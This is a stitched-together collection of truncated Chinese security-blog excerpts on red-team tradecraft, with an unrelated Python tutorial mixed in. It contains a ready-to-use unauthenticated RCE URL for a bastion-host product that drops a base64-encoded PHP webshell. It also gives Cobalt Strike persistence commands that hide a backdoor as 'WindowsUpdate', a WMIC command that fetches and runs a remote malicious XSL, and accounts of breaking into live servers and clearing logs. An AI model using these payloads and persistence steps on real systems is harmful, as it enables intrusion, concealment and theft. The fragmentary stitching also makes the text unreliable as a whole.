红队攻击面相关讨论

一、齐治堡垒机前远程命令执行漏洞（CNVD-2019-20835）1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 "OK".（未授权无需登录）2、访问如下链接即可获得getshell，执行成功后，生成PHP一句话马https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}3.getshell访问路径：/var/www/shterm/resources/qrcode/lbj77.php https://10.20.10.10/shterm/resources/qrcode/lbj77.php(密码10086)据说还是另外一个版本是java的: POST /shterm/listener/tui_update.php a=["t';import os;os.popen('whoami')#"] 二、天融信TopApp-LB 负载均衡系统Sql注入漏洞 1.利用POC:POST /acc/clsf/report…

前言 Python切片有着很广泛的应用尤其是算法里,就比如： 此时我定义了一个字符串str”woxihuanshenyu” print(str[0:-1])#输出第一个到倒数第二个所有字符 print(str[2:5])#输出第三个到第五个字符 print(str[2:])#输出第三个往后的所有字符 此时输出： 这里以图片展示了 正文 那我们就可以知道负号是倒数的意思 那么我们将切片用于数组当中 我们简单引用OJ162http://acm.zzuli.edu.cn/problem.php?id=1162作为样例来讲述切片的用法（这里解释一下python的指针其实就是对象）另外OJ只要保证结果对就行 不一定要定义他们给的函数 我们先看要求： 答案： 下面八行代码就可以成功提交OJ def f(a,n,k): a=a[-k:]+a[:-k] return a n=int(input()) a=list(map(str,input().split())) k=int(input()) a=f(a,n,k) print(*a) 输出结果： 怎么样,也不用调用任何库,简便吧,下面拓展为大家解释切片和改动一些代码让我们更能理解 先比较一下C和C++代码： C和C++的代码均引用网上的（非本人编写） 下面是C语言代码来源:https://blog.csdn.net/viv…

第1章 赛前准备——安装 译者：@Snowming 作为红队人员，我们通常不太关注某次攻击的目的（更关注的是攻击手法）。相反，我们想从那些高级威胁组织的 TTP（Tactics、Techniques & Procedures）中学到更多。举个例子，这是一个来自于火眼(FireEye)公司的公开的威胁情报分析报告。从报告中，我们可以看到：这个威胁组织使用推特作为 C2 服务器，也使用了 github 作为存储加密图片和经过信息隐写文件的仓库。 我们可以参考此报告，根据攻击手法的特点来针对性的做出合适的防御方案，来看你的公司是否能发现并拦截这种攻击。 让我们对 APT 攻击做一些基本的介绍。由 MITRE 公司提出的 ATT&CK 矩阵( Adversarial Tactics, Techniques, and Common Knowledge matrix ) 是对 APT 攻击的详细分解。这个矩阵中是一个在各种攻击场景中使用的不同 TTP 的大集合。 商用 ATT&CK 矩阵 - Windows版 译者注： 上面的矩阵仅仅包扩适用于 Windows 平台的技术。完整的商用 Enterprise ATT＆CK 矩阵也包括适用于 macOS 和 Linux 平台的技术。 矩阵中的内容严格复制自原书。只是因为原书图片分辨率太低，为了读者的阅读体验，特意重新作图。ATT&CK 矩阵至今没有中文翻译，因为译者才疏学浅，不敢献丑翻译，故保留英文。但是需要说明的是，书中列出的矩阵内容，跟 MITRE 公司官…

0x00 前言本文是关于“2024高校网络安全管理运维赛”的详细题解，主要针对Web、Pwn、Re、Misc以及Algorithm等多方向题目的解题过程，包含但不限于钓鱼邮件识别、流量分析、SQLite文件解析、ssrf、xxe等等。如有错误，欢迎指正。 0x01 Misc签到给了一个gif，直接在线分帧 得到synt{fvtava-dhvm-jryy-qbar}，一眼凯撒，直接rot13解码 flag{signin-quiz-well-done} 钓鱼邮件识别给了一个eml邮件文件，可以用邮箱软件查看，也可以直接查看（可能麻烦点） Flag 1 直接base64解码，得到flag{wElCoMeTo} Flag 2下面的内容是base64编码的信息 解码后查看，得到flag{phIsHhuntINg} Flag 3eml文件剩下的内容没有flag了，只能从发件人的域名下手了 查下dns解析，这里用的是360威胁情报中心 https://ti.360.net/domain/foobar-edu-cn.com （这个情报中心会记录比赛过程的解析历史，所以现在直接看子域名信息就能得到flag） 下面还是正常过一遍查询流程 除了第三方服务平台，也可以用windows自带的nslookup，查看域名的TXT记录 nslookup -qt=txt foobar-edu-cn.com 根据提示，应该是得去找该域名下的子域名的解析记录，三个拼接出完整的flag 由于域名是在国外申请的，国内很多网站都解析不出来，只能用国外的网站慢慢…

CRYPTO签到题-学会SMhttps://www.json.cn/encrypt/sm3题目要求小写所以需要转换一下或者脚本：import hashlib message = "heidun2024" hash_object = hashlib.new('sm3')hash_object.update(message.encode('utf-8'))hash_value = hash_object.hexdigest() print(hash_value) 源码和数据都要保护利用php在线解密工具解密php 得到php源代码 <?php function my_encode($str,$key) { $re=''; $len=strlen($str); for ($i=0;$i<$len;$i++) { $c=substr($str,$i,1); $k=substr($key,($i%strlen($key)),1); $num=ord($c)+ord($k); if($num>255) $num-=256; $re.=chr($num); } return $re;}function my_decode($str,$key) { return 'Something missed.';}$data=@$_GET['data'];$key=@$_GET['key'];if($key=='') $key='hdhd4321';if($data!='') { $mi=my_e…

WEB题目：Sanic's revenge解题步骤 首先看到给出的附件: from sanic import Sanic import os from sanic.response import text, html import sys import random import pydash # pydash==5.1.2 # 这里的源码好像被admin删掉了一些，听他说里面藏有大秘密 class Pollute: def __init__(self): pass app = Sanic(__name__) app.static("/static/", "./static/") @app.route("/*****secret********") async def secret(request): secret='**************************' return text("can you find my route name ???"+secret) @app.route('/', methods=['GET', 'POST']) async def index(request): return html(open('static/index.html').read()) @app.route("/pollute", methods=['GET', 'POST']) async def POLLUTE(request): key = re…

WEBEncirclingGame题目描述：A simple game, enjoy it and get the flag when you complete it.开题，前端小游戏，红点出不去就行 直接玩通关了 看看如何不玩也能拿到flag，flag存储在后端php文件内，前端找不到。看一下游戏的请求包，里面记录了红点的最后位置和防火墙（黑点）的位置。 那么我们伪造下，防火墙绕满周围一圈，但是红点在最中间。路由：/verifyVictory.php 方法：POST{"gameState":{"virusPosition":{"x":5,"y":5},"firewalls":[{"x": 0, "y": 0}, {"x": 1, "y": 0}, {"x": 2, "y": 0}, {"x": 3, "y": 0}, {"x": 4, "y": 0},{"x": 5, "y": 0}, {"x": 6, "y": 0}, {"x": 7, "y": 0}, {"x": 8, "y": 0}, {"x": 9, "y": 0}, {"x": 10, "y": 0}, {"x": 0, "y": 10}, {"x": 1, "y": 10}, {"x": 2, "y": 10}, {"x": 3, "y": 10}, {"x": 4, "y": 10}, {"x": 5, "y": 10}, {"x": 6, "y": 10}, {"x": 7, "y": 10}, {"x": 8, "y": 10}, {"x": 9, "y"…

前情提要上回故事说到，骗子服务器的最高权限虽然已经拿到，但这也只是技术层面的掌控，想要立案，需要提供尽量多的人员相关信息，如手机、银行卡等，但这些目前都并未采集到（前面虽然提到了某次源码有个银行账户，但后面发现那只是个测试号，百度出来一堆在用的…），所以还需要通过一些额外的手段去获取有用的信息； 信息收集宝塔后台首先想到的就是之前一直留着没进去的宝塔面板后台，里面应该会有些登录信息之类，但并没有得到登录密码，但这也并没有太大影响，因为现在可以直接访问宝塔的数据库文件（panel/data/default.db， sqlite数据库文件），所以直接进去备份个账户然后设置个密码，防止把正常账户挤下去： 清理下日志，然后就是愉快的登录进去 ㄟ( ▔, ▔ )ㄏ： 首先看到的就是账户名，想是管理员的手机号，这里看不全，去设置里面瞅瞅： 这里也是中间四位打了星号，从源码里也看不出，但这些也都是纸老虎，因为随后审查发现一处接口请求数据，返回信息里是完整的手机号，微信搜了下也有这个这么个账户： 但其真实性未知，多半只是个幌子，先记着吧； 新起点在之后某个时间点准备继续收集信息的时候，发现其域名甚至IP都无法再访问了，后面几天试了也都不行，感觉可能是收割完一波然受卷款跑路了；自然，除了一些信息，之前获取的所有权限，都化作泡影了；也是在这之后，警察蜀黍竟主动联系了过来（没有喝茶，俺是良民 $_$），由于想着再碰碰运气看看，结果有趣的事再次发生了，访问之前那个IP展示出了这么个页面： 好吧得承认，那一瞬间确实差点信了这标题和图标，还浪…

0x01 前言 FourAndSix2是易受攻击的一个靶机，主要任务是通过入侵进入到目标靶机系统然后提权，并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址： https://download.vulnhub.com/fourandsix/FourAndSix2.ova 0x02 信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.9是目标靶机系统 2.端口探测 使用Nmap对靶机进行扫描 nmap -A 192.168.1.9 查询到开放的端口及服务：22-ssh、111-rpcbind、2049-nfs、612-mountd 0x03 漏洞利用 1.nfs漏洞利用 开放2049端口，nmap探测显示为nfs服务，使用metasploit进行扫描可挂载目录 msf > use auxiliary/scanner/nfs/nfsmount msf auxiliary(scanner/nfs/nfsmount) > show options Module options (auxiliary/scanner/nfs/nfsmount): NameCurrent Setting Required Description ------------------- -------- ----------- PROTOCOLudp yes The p…

1.注册表启动注意：优先用这种方式来进行权限维持task.exe是CS生成的后门文件，这里后门文件可以对其做免杀隐藏文件shell attrib C:\Windows\task.exe +s +h注册表启动后门文件shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\Windows\task.exe" /f 2.windows服务自动启动隐藏文件shell attrib C:\Windows\task.exe +s +h服务自动启动执行后门文件shell sc create "WindowsUpdate" binpath= "cmd /c start C:\Windows\task.exe"shell sc config "WindowsUpdate" start= autoshell net start "WindowsUpdate"或者3.SharpStay.exe 自动化任务启动SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\task.exe" 4.自动启动服务目录(win7系统才有效）shell copy "C:\Windows\task.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Sta…

0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞，通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息。 Moonraker: 1镜像下载地址： http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA 0x02 信息收集 1.存活主机扫描 root@kali2018:/# arp-scan -l 发现192.168.1.10是目标靶机系统 2.端口扫描 namp扫描目标靶机端口 root@kali2018:~# nmap -p - -A 192.168.1.10 --open Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 16:21 EST Nmap scan report for 192.168.1.10 Host is up (0.00077s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open sshOpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0) | ssh-hostkey: | 2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA) | 256 53:59:87:…

0x00 简介 很长一段时间以来，HTA文件一直被web攻击或在野恶意软件下载程序用作恶意程序的一部分。HTA文件在网络安全领域内广为人知，从红队和蓝队的角度来看，它是绕过应用程序白名单有价值的“古老”方式之一。运行Microsoft HTML应用程序主机的Mshta.exe，Windows OS实用程序负责运行HTA（HTML应用程序）文件。我们可以运行JavaScript或Visual的HTML文件。您可以使用Microsoft MSHTA.exe工具解析这些文件。 0x01 HTA重要性 最后，利用htaccess文件或基于浏览器的分类的其他策略转移将有助于提高利用率。利用HTA文件进行基于web的攻击。HTA文件中有大量的灵活性; 你将有效地使它看起来像一个Adobe更新程序。此外，通过HTTPS使HTA文件限制不使用少许SSL拦截/阻断的发现率也是有用的。HTA记录有助于绕过防病毒，因为它们仍没有被很好地识别到。最后但并非不重要的HTA也可以用于网络钓鱼，取代旧的Java applet。 0x02 攻击方法 HTA攻击有多种方法，如下所示： Metasploit Setoolkit Magic unicorn Msfvenom Empire CactusTorch Koadic Great SCT 1.第一种方法：Metasploit 我们的第一种方法是在Metasploit中使用inbuild exploit。为此，请进入到kali中的终端并输入命令：msfconsole metasploit包含“hta …

0x01 漏洞描述 近日，Oracle WebLogic Server 远程代码执行漏洞 （CVE-2020-14882）POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求，利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件，且该漏洞通过HTTP协议进行利用。将CVE-2020-14882和CVE-2020-14883进行组合利用后，远程且未经授权的攻击者可以直接在服务端执行任意代码，获取系统权限 0x02 漏洞影响 Oracle WebLogic Server，版本10.3.6.0，12.1.3.0，12.2.1.3，12.2.1.4，14.1.1.0 0x03 漏洞复现： 一、环境配置 1.本次漏洞复现采用vulhub的环境，weblocig的版本为12.2.1.3.0,该版本存在漏洞 https://github.com/vulhub/vulhub/tree/173136b310693d50cac183c6218e64c861e2aaf5/weblogic/CVE-2020-14882 2.复现漏洞环境配置 git clone https://github.com/vulhub/vulhub.git cd vulhub/ cd weblogic/ curl -s https://bootstrap.pypa.io/get-pip.py | pyt…

前言 /usr/sbin/souurces-media-unmount 未能在600s内完成 昨天没有认真打靶场,在此深刻反思自己,是因为在搞一些其他东西 如果你不幸和我卡百分之九十一,尝试去搜索引擎上搜索,是没有任何解决办法的,别问,问就是试过了 搜索引擎上一共有两个答案：一个是注释配置文件,一个是杀死进程 可以明确的说,都不管用 关于Parror 我一直都在用kali linux但是听,Parror比kali linux好用,今日一上手感觉不错. 我硬盘一直不够,所以就没用 但是就在昨天我终于狠心删除了陪伴我一个暑假的PUBG腾出来一些内存安装Parror,现在电脑上基本没游戏了 呜呜呜等我升级完硬盘在下回来 总之她挺好的 踩坑一天的解决方法 一句话： 安装前换apt源,我换的是清华的apt源 这样就安装成功了 另外再次感谢我亲爱的昔日Thm国区第一的群主

羊城杯-2024webweb2进题信息搜集一下，dirsearch发现了login路由可访问，先随便点一下，发现了一个文件读取： http://139.155.126.78:30148/lyrics?lyrics=Rain.txt我尝试了一下： http://139.155.126.78:30148/lyrics?lyrics=../../../../../../../../etc/passwd发现可以读取： 本以为是任意文件读取，但是没有这么简单。 所以先尝试一下读取源码，用那个/static/style.css进行尝试： 发现读取文件的目录是在/var/www/html/XXX/这个目录下的，那么尝试一下读取app.py： 找到源码了。那么接下来就好办了，源码附上： import os import random from config.secret_key import secret_code from flask import Flask, make_response, request, render_template from cookie import set_cookie, cookie_check, get_cookie import pickle app = Flask(__name__) app.secret_key = random.randbytes(16) class UserData: def __init__(self, username): self.user…

0x00 前言 ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。 0x01 影响范围 5.x < 5.1.31, <= 5.0.23 0x02 漏洞分析 Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815 路由信息中controller的部分进行了过滤，可知问题出现在路由调度时 关键代码： 在修复之前程序未对控制器进行过滤，导致攻击者可以通过引入\符号来调用任意类方法。 其中使用了$this->app->controller方法来实例化控制器，然后调用实例中的方法。跟进controller方法： 其中通过parseModuleAndClass方法解析出$module和$class，然后实例化$class。 而parseModuleAndClass方法中，当$…

Active Directory中获取域管理员权限的攻击方法 译：by backlion 0x00 前言 攻击者可以通过多种方式在Active Directory中获得域管理员权限, 这篇文章是为了描述当前使用的一些当前热门的内容, 这里描述的技术“假设违规”，攻击者已经在内部系统上获得权限，并获得域用户认证凭据（又称后渗透利用）。 对于大多数企业而言，不幸的事实是，攻击者通常不会花更长时间从普通域用户转到域管理员。受害者的问题是："这是怎么发生的？"。攻击者经常以鱼叉式的钓鱼电子邮件开始给一个或多个用户发送邮件，使被攻击者能够在目标网络中的计算机上运行他们的代码。一旦攻击者的代码在企业内部运行，第一步是进行信息收集，以发现有用的资源来进行提权、持久性攻击，当然，还包括截取信息。 虽然整个过程细节各不相同，但总体框架仍然存在： 1.恶意软件注入（网络钓鱼，网络攻击，等等） 2.信息探测（内部） 3.凭据盗窃 4.攻击与权限提升 5.数据访问和泄露 6.持久性（会话访问） 我们从攻击者获取到企业内部普通权限开始，因为在当前环境网络中通常并不困难，此外，攻击者通常也不难从普通客服端上的用户权限提升为具有本地管理员权限。此用户提权可以通过利用系统上未修补的补丁漏洞或更频繁地发现在SYSVOL中查找到本地管理员的密码，例如组策略首选项。 0x01 SYSVOL和组策略首选项中的密码获取 这种方法是最简单的，因为不需要特殊的“黑客”工具，所有的攻击方法必须是打开Windows资源管理器并搜索域名为SYSV…

前言 记录今天看到群友问到一道题 看下题目 明文:flag{P7?Y0OG?0XPC?ZPK} 密文:9e86????007f??9a38???449a?0ea7cf 一眼看出来是MD5加密 MD5严格来说不能算加密 只能暴力爆破 脚本暴力破解缺失字符 关于MD5一些加解密等方法需要系统的去学习一下 如果猛地一出 让新手都不会 所以解决的办法最好是：先从网上找相似的题+题型+找代码+AI改代码 具体代码如下： import hashlib #flag{P7?Y0OG?0XPC?ZPK} s1 = "flag{P7" s2 = "Y0OG" s3 = "0XPC" s4 = "ZPK}" chars = ['0','1','2','3','4','5','6','7','8','9','0','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'] for i in chars: for j in chars: for k in chars: flag = s1 + i + s2 + j + s3 + k + s4 pre = hashlib.md5() # create an instance of md5 cla…

连接上靶机过后 直接查看日志 cd /var/log 发现是通过apache搭建的web服务 也可查看外联和端口开开放情况 netstat -pantu 这里也可以确定开启了apache服务 也确实为apache + php 接下来查看木马文件 一个一个文件看不现实 直接使用find命令去匹配shell字段中可能存在的敏感字段去查找webshell find ./ -name "*.php" |xargs grep "eval(" 查找到三个文件 下面来看第一个./include/gz.php 发现第一个隐藏的flag flag{027ccd04-5065-48b6-a32d-77c704a5e26d} 其实这个一眼可以看出来是哥斯拉 哥斯拉php马特征 session_start() 创建或者重启一个会话 @set_time_limit(0) 设置程序最长运行时间 永远 @error_reporting(0) 关闭错误报告 $key=xxxxxxxxx 加解密的盐值 哥斯拉php马的利用逻辑： 第一次通信时，服务端通过POST方式传递一个名叫pass的参数给木马，给pass参数赋的值是加密后的一组用”|”隔开的方法，也就是接下来要使用的攻击荷载。荷载在解密后被存入SESSION，供之后使用。 从第二次通信开始，pass传入的是远控命令，通过攻击荷载中的run()方法执行远控命令。然后对回显进行加密后传输给哥斯拉的服务端。 所以第二个flag就是Godzi…

0X00 事情起因 大街上偶遇预存话费3999送平板被套路，支付宝被一顿操作又套现又转账的把我花呗都套走了。 回到家越发越觉得不对劲，越发越后悔，网上一搜关于这类的活动一抓一大把而且一模一样越看是越生气啊。 最主要的呢，送的平板也是八百多的根本不值预存话费的这个价，且居然有卡死的现象，于是乎我决定深挖瞧瞧。 0X01 信息收集 通过验证短信发过来的短域名链接复制到浏览器解析得到网址xx.xxxx.xx好家伙这网址一看就不是移动官方旗下的,在通过站长工具查询该网址解析到阿里云且未启用cdn，该域名持有者系广东一家某科技公司，域名到今年11月份就到期了，在通过搜索该企业发现经营异常这四个大字，我这好几千的话费肯定是凉透了。 通过对得到的域名用nmap -p 1-65355 xx.xxxx.xx进行全端口扫描瞧瞧都开放了哪些服务，再从其服务进行入手，可以看到也就只有80跟22端口，唯一有用的信息就是22端口知道对方是Linux服务器的。 在通过对80端口访问web服务得到以下信息，这界面也是短信内容里短域名所跳转过来的界面。 它的URL形式是/admin/user/login明显的用户登陆界面，众所周知admin是管理的意思，直觉让我逐层递减目录访问，果不其然跳转到了admin/login的商家管理界面。 0X02 漏洞挖掘目前初步找出两个登陆界面，后台登陆是没有验证码的可进行爆破操作，但前提条件是知道商家的手机号，这里就先正常登陆我自己的用户瞧瞧里面有无可利用的地方，功能很简单并无可利用的地方头像处也无法进行编辑上传等操…

0x01 前言Date/time：2015年，这次渗透测试中发现已经拿下的几台机器的管理员密码存在一定规律性，最终通过分析密码规律、组合新密码成功拿下目标整个C段机器权限，个人感觉这是个不错的内网通用/规律密码实战案例，所以想着还是记录一下吧。 0x02 Getshell过程网站基本信息探测： 目标站点：http://www.that****elos.com.br 服务器IP：189.**.**.204（巴西） 环境平台：ASP.NET 服务器系统：Windows这个网站禁止国内IP访问，所以只能上墙去做测试了，先用Chrome浏览器插件和指纹识别网站都未能得到服务器系统具体版本，不过根据个人经验猜测这应该是台Windows2003。 Chrome浏览器插件：Server Details 1.0.12、Wappalyzer 服务器系统识别：http://fuwuqixitongshibie.51240.com/?q= 网站后台地址：http://www.that****elos.com.br/admin/接着我们用Safe3WVS_v10.1漏洞扫描工具成功找到几处注入，并使用sqlmap工具验证这个注入点确实是存在的，并且已经跑出管理员的表和列，只不过在跑管理员用户密码时报错了。 跑表名： sqlmap -u "http://www.that****elos.com.br/detalhe_produto.asp?codProd=510" --tables [7 tables]：categorias，clientes，destaque…

一、日志数据收集 日志数据收集是从服务器或设备生成的记录中收集的实时过程。此组件可以通过文本文件或Windows事件日志接收日志。它还可以通过远程syslog直接接收日志，这对防火墙和其他此类设备非常有用。 此过程的目的是识别应用程序或系统程序错误，配置错误，入侵威胁，触发策略或安全问题。 Wazuh aegnt 的内存和CPU要求是，因为它的非常低的，主要作用是将事件转发给管理器。但是，在Wazuh管理器上，CPU和内存消耗可能会迅速增加，具体取决于管理器每秒事件数分析数量（EPS）。 1.处理流程 下图说明了事件的处理流程： 2.日志收集 2.1 日志文件 可以将日志分析引擎配置为监控服务器上的特定文件 示例配置： Linux： <localfile> <location>/var/log/example.log</location> <log_format>syslog</log_format> </localfile> windows： <localfile> <location>C:\myapp\example.log</location> <log_format>syslog</log_format> </localfile> 2.2Windows事件日志 Wazuh可以监控典型的Windows事…

0x00 前言 针对于内网渗透个人理解为信息收集（内部网段的扫描、端口服务、操作系统、补丁更新、域机器及重要业务机器定位、杀毒软件、防火墙策略、密码的规则、内部敏感文档等）然后根据获取到的信息来绘画出内部的网络结构和内网脆弱点从而进行横向渗透。 本篇文章记载了当拿到内网机器的密码或Hash进行横向移动的方式。 0x01 环境介绍 1.1 扩展图 1.2 网络环境 Windows 7 跳版机（192.168.200.222、10.211.66.5）双网卡可出网也可与内网连通。 Windows server 2012 目标靶机（192.168.200.66）不可出网。 1.3 简述 攻击者通过渗透测试拿到主机Win 7(192.168.200.222)的权限并发现可出网，所以上线CS用来权限维持。 前提我们已经抓取到Win 7(192.168.200.222)跳板机的登陆明文凭证，这里是我添加的明文凭证，窃取凭证的方法有很多这里不在赘述参考文章，此篇文章只记录个人在学习内网环境下横向移动的一些笔记。 添加一个 Win 7(192.168.200.222)跳板机的监听器用来做中转会话。 生成木马文件在本地。 Tips：因为Win 2012(192.168.200.66)目标机不出外网所以选择刚添加的中转会话。 0x02 IPC$ && 计划任务 2.1 利用条件 1）没有禁用IPC$连接、139和445端口、未使用防火墙等方式来阻止IPC$。 2）目标机器开启了相…

一、前言 HFish 是一款基于 Golang 开发的跨平台多功能主动攻击型蜜罐钓鱼平台框架系统，为了企业安全防护测试做出了精心的打造 发布版本下载链接： https://github.com/hacklcx/HFish/releases Github: https://github.com/hacklcs/HFish多功能 不仅仅支持 HTTP(S) 钓鱼，还支持支持 SSH、SFTP、Redis、Mysql、FTP、Telnet、暗网等蜜罐扩展性 提供 API 接口，使用者可以随意扩展钓鱼模块 ( WEB、PC、APP )便捷性 使用 Golang 开发，使用者可以在 Win + Mac + Linux 上快速部署一套钓鱼平台二、集群搭建1.环境说明：client01:66.42.68.123（客户端1）clinet02:144.202.85.37（客户端1）server:104.156.253.44（服务端）2.服务端安装与配置root@server:~# wget https://github.com/hacklcx/HFish/releases/download/0.6.4/HFish-0.6.4-linux-amd64.tar.gzroot@server:~# tar zxvf HFish-0.6.4-linux-amd64.tar.gz root@server:~# vi config.ini #需要将statuse修改为1，后台密码修改为复杂密码，db_str数据库生产环境建议采用mysql远程…

一、Wmic.exe wmic实用程序是一款Microsoft工具，它提供一个wmi命令行界面，用于本地和远程计算机的各种管理功能，以及wmic查询，例如系统设置、停止进程和本地或远程运行脚本。因此，它可以调用XSL脚本来执行。 二、攻击方法 1.第一种方法：Koadic 我们将在Koadic的帮助下生成一个恶意的XSL文件，它是一个命令和控制工具，与Metasploit和PowerShell empire非常相似。 要了解Koadic的工作原理，请阅读我们的文章：https://www.hackingarticles.in/koadic-com-command-control-framework/ 安装完成后，您可以运行./koadic文件来启动koadic，并通过运行以下命令开始加载stager/js/wmic，并设置SRVHOST。 use stager/js/wmic set SRVHOST 192.168.1.107 run 执行WMIC以下命令从远程服务器下载并运行恶意XSL文件： wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl" 一旦恶意XSL文件在目标机器上执行，您就会像Metasploit一样拥有Zombie连接。 2.第二种方法：PowerShell Empire 对于我们的下一个wmic 攻击方法，我们将使用empire。empire是一款后开发框架。到目前为止，我们已经将XSL标记与metasploit匹配，但…